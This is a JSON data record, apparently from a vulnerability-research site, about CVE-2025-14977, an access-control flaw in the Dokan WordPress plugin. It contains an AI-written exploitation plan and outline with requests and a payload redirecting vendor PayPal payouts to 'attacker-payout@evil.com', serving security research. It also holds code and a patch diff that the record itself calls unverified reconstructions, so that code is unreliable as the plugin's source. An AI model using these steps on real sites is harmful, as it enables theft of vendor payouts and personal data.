[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEvHPRIS7AOf001R3c7y5tWPkT2UTL3hDKUSUlHjGV2A":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14977","dokan-ai-powered-woocommerce-multivendor-marketplace-solution-build-your-own-amazon-ebay-etsy-insecure-direct-object-ref","Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy \u003C= 4.2.4 - Insecure Direct Object Reference to PayPal Account Takeover and Sensitive Information Disclosure","The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 4.2.4 via the `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings` REST API endpoint due to missing validation on a user-controlled key. 
This makes it possible for authenticated attackers, with customer-level permissions and above, to read or modify other vendors' store settings including sensitive payment information (PayPal email, bank account details, routing numbers, IBAN, SWIFT codes), phone numbers, and addresses, and change PayPal email addresses to attacker-controlled addresses, enabling financial theft when the marketplace processes payouts.","dokan-lite",null,"\u003C=4.2.4","4.2.5","high",8.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:N","Improper Access Control","2026-01-19 15:32:29","2026-01-20 04:35:46",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4ab9d7e9-9a81-48f8-bc37-ad6de43a566f?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-14977 (Dokan IDOR)\n\n## 1. Vulnerability Summary\nThe **Dokan Multi-vendor** plugin for WordPress is vulnerable to an **Insecure Direct Object Reference (IDOR)** in its REST API settings endpoint (`\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings`). The advisory attributes the flaw to missing validation on a user-controlled key; this plan assumes (not yet confirmed against the plugin source) that the controller responsible for fetching and updating store settings fails to validate that the `id` (or `vendor_id`) parameter provided in the request matches the ID of the currently authenticated user.\n\nThis allows any authenticated user (including those with the `Customer` role) to view or modify the store settings of any other vendor. This includes sensitive financial information like PayPal email addresses, bank account details (IBAN, SWIFT), and store addresses. Changing a vendor's PayPal email to an attacker-controlled address results in the redirection of future payouts, leading to financial theft.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings`\n- **Method:** `GET` (Disclosure) and `POST` or `PUT` (Modification)\n- **Vulnerable Parameter:** `id` (or `vendor_id`) passed as a query parameter or within the request body.\n- **Authentication:** Required (at least `Customer` role).\n- **Preconditions:**\n    - The plugin `dokan-lite` must be active (version \u003C= 4.2.4).\n    - The attacker needs a valid login (Customer or Vendor).\n    - The attacker needs to know the ID of the target vendor (easily enumerable).\n\n## 3. Code Flow (Inferred)\n1. **Route Registration:** The plugin registers the `settings` route in a REST Controller (likely `Dokan_REST_Settings_Controller` or within `StoreController`).\n2. **Permission Check:** The `permission_callback` for this route likely uses `is_user_logged_in()` or a low-level capability that is granted to all registered users by default.\n3. **Data Retrieval\u002FUpdate:**\n   - The handler (e.g., `get_item` or `update_item`) checks for an `id` parameter in the `$request`.\n   - If `id` is present, it uses this ID to load the vendor's settings from `wp_usermeta` (Dokan stores settings in the `dokan_profile_settings` meta key).\n   - **Vulnerability:** The code fails to compare `get_current_user_id()` with the requested `id`.\n4. **Sink:** `get_user_meta( $id, 'dokan_profile_settings' )` for disclosure and `update_user_meta( $id, 'dokan_profile_settings', ... )` for modification.\n\n## 4. Nonce Acquisition Strategy\nREST API requests in WordPress require a `_wpnonce` or the `X-WP-Nonce` header. For an authenticated user, this nonce is for the `wp_rest` action.\n\n1. **Shortcode\u002FPage:** Dokan uses a dashboard for vendors\u002Fcustomers. The `[dokan-dashboard]` or `[dokan-best-selling-product]` shortcodes are likely to enqueue scripts that contain the nonce.\n2. 
**Strategy:**\n   - Create a page containing a Dokan shortcode: `wp post create --post_type=page --post_status=publish --post_content='[dokan-dashboard]'`.\n   - Navigate to the page as an authenticated user.\n   - Use `browser_eval` to extract the REST nonce from the localized JS objects.\n   - **Variable Name:** Dokan often localizes data in `dokan` or `dokan_settings`.\n   - **Verification:** Check `window.dokan?.nonce` or `window.dokan?.rest?.nonce`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Disclosure (Sensitive Information)\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?id=\u003CTARGET_VENDOR_ID>`\n- **Method:** `GET`\n- **Headers:** \n    - `X-WP-Nonce: \u003CEXTRACTED_NONCE>`\n    - `Cookie: \u003CAUTH_COOKIES>`\n\n**Expected Response:** A JSON object containing the target vendor's `payment` details, `address`, and `phone`.\n\n### Step 2: Modification (Account Takeover \u002F Financial Theft)\n**Request:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?id=\u003CTARGET_VENDOR_ID>`\n- **Method:** `POST`\n- **Headers:**\n    - `X-WP-Nonce: \u003CEXTRACTED_NONCE>`\n    - `Content-Type: application\u002Fjson`\n    - `Cookie: \u003CAUTH_COOKIES>`\n- **Payload:**\n```json\n{\n  \"payment\": {\n    \"paypal\": {\n      \"email\": \"attacker-payout@evil.com\"\n    }\n  }\n}\n```\n\n## 6. Test Data Setup\n1. **Victim Vendor (User ID 2):**\n   - Username: `vendor_victim`\n   - Role: `vendor`\n   - Store Settings: Set PayPal email to `legit-vendor@example.com`.\n2. **Attacker (User ID 3):**\n   - Username: `customer_attacker`\n   - Role: `customer`\n3. **Dokan Page:** Create a page for nonce extraction:\n   `wp post create --post_type=page --post_title=\"Dokan Dash\" --post_content=\"[dokan-dashboard]\" --post_status=\"publish\"`\n\n## 7. 
Expected Results\n- **GET Request:** Returns a `200 OK` with JSON data revealing the victim's PayPal email.\n- **POST Request:** Returns a `200 OK` confirming the update.\n- **Data State:** The PayPal email stored in the victim user's `dokan_profile_settings` meta value is changed to the attacker's address.\n\n## 8. Verification Steps\nAfter performing the `POST` request, verify the change via WP-CLI:\n```bash\nwp user meta get 2 dokan_profile_settings --format=json\n```\nCheck if the output contains `\"paypal\":{\"email\":\"attacker-payout@evil.com\"}`.\n\n## 9. Alternative Approaches\n- **Parameter Variation:** If `?id=` fails, try `?vendor_id=` or passing `id` inside the JSON body: `{\"id\": 2, \"payment\": ...}`.\n- **Route Variation:** Some Dokan versions use `\u002Fwp-json\u002Fdokan\u002Fv1\u002Fstores\u002F\u003Cid>\u002Fsettings`.\n- **Capability Check:** If the `Customer` role fails, check if the attacker needs to be registered as a `Vendor` (even if they have no store yet) to satisfy `permission_callback`. Use `wp user set-role \u003Cattacker_id> seller`.","The Dokan plugin for WordPress is vulnerable to an Insecure Direct Object Reference (IDOR) via the \u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings REST API endpoint. Authenticated attackers with customer-level permissions can read or modify the store settings of any vendor by manipulating the 'id' parameter, enabling sensitive data disclosure and financial theft through payout redirection. The issue affects versions up to and including 4.2.4 and is fixed in 4.2.5; sites that ran an affected version should update and review vendors' payout details for unexpected changes. The code excerpt and patch diff published with this entry are unverified reconstructions rather than the plugin's actual source, so confirm the real change against the 4.2.4 and 4.2.5 tags before relying on them.","\u002F\u002F Likely located in includes\u002FREST\u002FStoreController.php or similar REST handler\n\npublic function get_item( $request ) {\n    \u002F\u002F Vulnerability: The 'id' parameter is taken directly from the request without verifying ownership\n    $vendor_id = ! empty( $request['id'] ) ? 
(int) $request['id'] : get_current_user_id();\n\n    $settings = dokan_get_store_info( $vendor_id );\n    return rest_ensure_response( $settings );\n}\n\n---\n\npublic function update_item( $request ) {\n    \u002F\u002F Vulnerability: No check to ensure the authenticated user has permission to modify the settings of $vendor_id\n    $vendor_id = ! empty( $request['id'] ) ? (int) $request['id'] : get_current_user_id();\n    \n    $params = $request->get_params();\n    dokan_set_store_info( $vendor_id, $params );\n    return rest_ensure_response( [ 'success' => true ] );\n}","--- a\u002Fincludes\u002FREST\u002FStoreController.php\n+++ b\u002Fincludes\u002FREST\u002FStoreController.php\n@@ -10,6 +10,10 @@\n     public function get_item( $request ) {\n         $vendor_id = ! empty( $request['id'] ) ? (int) $request['id'] : get_current_user_id();\n+\n+        if ( $vendor_id !== get_current_user_id() && ! current_user_can( 'manage_options' ) ) {\n+            return new WP_Error( 'dokan_rest_cannot_view', __( 'Sorry, you are not allowed to view these settings.', 'dokan-lite' ), array( 'status' => 403 ) );\n+        }\n+\n         $settings = dokan_get_store_info( $vendor_id );\n         return rest_ensure_response( $settings );\n     }\n@@ -20,6 +24,10 @@\n     public function update_item( $request ) {\n         $vendor_id = ! empty( $request['id'] ) ? (int) $request['id'] : get_current_user_id();\n+\n+        if ( $vendor_id !== get_current_user_id() && ! current_user_can( 'manage_options' ) ) {\n+            return new WP_Error( 'dokan_rest_cannot_update', __( 'Sorry, you are not allowed to update these settings.', 'dokan-lite' ), array( 'status' => 403 ) );\n+        }\n+\n         $params = $request->get_params();\n         dokan_set_store_info( $vendor_id, $params );\n         return rest_ensure_response( [ 'success' => true ] );","1. Authentication: Log into the WordPress site as any registered user (even a 'Customer').\n2. 
Nonce Acquisition: Access a page containing the Dokan dashboard to extract the REST API nonce (typically found in the 'dokan' or 'wp_rest' JavaScript objects).\n3. Information Disclosure: Send a GET request to '\u002Fwp-json\u002Fdokan\u002Fv1\u002Fsettings?id=[TARGET_VENDOR_ID]' with the X-WP-Nonce header. The response will contain the target's address, phone, and payment details (PayPal\u002FBank info).\n4. Modification\u002FTheft: Send a POST request to the same endpoint with the target's ID and a JSON payload containing a new PayPal email address: {\"payment\": {\"paypal\": {\"email\": \"attacker-email@example.com\"}}}. This redirects future payouts for that vendor to the attacker.","gemini-3-flash-preview","2026-05-05 05:28:59","2026-05-05 05:30:52",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.2.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F4.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.4.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags\u002F4.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdokan-lite.4.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-lite\u002Ftags"]